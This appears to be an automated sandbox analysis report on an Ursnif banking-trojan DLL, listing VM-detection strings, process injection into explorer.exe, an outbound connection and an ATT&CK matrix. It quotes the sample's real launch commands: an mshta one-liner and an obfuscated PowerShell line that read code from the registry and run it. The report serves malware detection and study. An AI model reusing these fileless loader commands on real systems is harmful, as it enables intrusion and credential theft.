                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Uses ping.exe to sleep
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4988Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4426
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 389
                      Source: C:\Windows\SysWOW64\rundll32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: explorer.exe, 00000013.00000000.619226655.0000000007EF6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}8Ll/
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: RuntimeBroker.exe, 00000018.00000000.768961763.0000013857059000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWt
                      Source: rundll32.exe, 00000003.00000002.642848364.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.517536202.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: rundll32.exe, 00000003.00000002.642559499.0000000000A8A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@1
                      Source: explorer.exe, 00000013.00000000.621617255.000000000807B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                      Source: mshta.exe, 00000009.00000003.534167119.0000021937BC4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000013.00000000.662218249.0000000007F91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                      Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPort

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.189.151.28 80
                      Maps a DLL or memory area into another process
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
                      Source: C:\Windows\System32\control.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
                      Writes to foreign memory regions
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF79BDC12E0
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\control.exe base: 7FF79BDC12E0
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: D48000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 2E00000
                      Source: C:\Windows\System32\control.exeMemory written: C:\Windows\explorer.exe base: 7FFA73801580
                      Changes memory attributes in foreign processes to executable or writable
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute read
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Source: C:\Windows\System32\control.exeMemory protected: C:\Windows\explorer.exe base: 7FFA73801580 protect: page execute and read and write
                      Allocates memory in foreign processes
                      Source: C:\Windows\System32\control.exeMemory allocated: C:\Windows\explorer.exe base: 2E00000 protect: page execute and read and write
                      Injects code into the Windows Explorer (explorer.exe)
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: D48000 value: 00
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: EB
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 2E00000 value: 80
                      Source: C:\Windows\System32\control.exeMemory written: PID: 684 base: 7FFA73801580 value: 40
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Windows\SysWOW64\rundll32.exeThread register set: target process: 4324
                      Source: C:\Windows\System32\control.exeThread register set: target process: 684
                      Creates a thread in another existing process (thread injection)
                      Source: C:\Windows\System32\control.exeThread created: C:\Windows\explorer.exe EIP: 73801580
                      Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Kmli='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Kmli).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\tIJVb0BvkI.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name smlsiwoq -value gp; new-alias -name dbmfrylmpa -value iex; dbmfrylmpa ([System.Text.Encoding]::ASCII.GetString((smlsiwoq "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2tb3qiq3\2tb3qiq3.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5xaibb03\5xaibb03.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES109F.tmp" "c:\Users\user\AppData\Local\Temp\2tb3qiq3\CSCCA338523CEA149558ADCBDE2BD495CFE.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES37BE.tmp" "c:\Users\user\AppData\Local\Temp\5xaibb03\CSC5E69315C691F4C1A85D8DAF9C7145CE8.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 00000013.00000000.614468947.0000000006100000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.661504495.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.606382937.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: YProgram Managerf
                      Source: explorer.exe, 00000013.00000000.607103050.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.644292443.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000013.00000000.605773443.0000000001430000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01063365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01064B89 SwitchToThread,GetSystemTimeAsFileTime,_aullrem,Sleep,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01066D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_01063365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected Ursnif
                      Source: Yara matchFile source: 00000003.00000003.517711866.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469735730.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471516390.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.604150409.00000227ABD6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595627275.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471577769.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.516674396.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471331342.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471420335.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471258459.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.571473861.0000000005DB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.471561246.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.595756334.0000029B55BFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.518581548.0000000004F0C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.469997167.0000000005108000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7020, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3300, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4324, type: MEMORYSTR
                      Source: Yara matchFile source: 3.2.rundll32.exe.1060000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.4b694a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50894a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.500a4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.50b6b40.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.641851907.0000000004B69000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517608074.000000000500A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.517654657.0000000005089000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.593793333.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.584416137.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.643432070.0000000004D8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.595167769.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.642402320.00000000009C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		Path Interception812
                      Process Injection                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
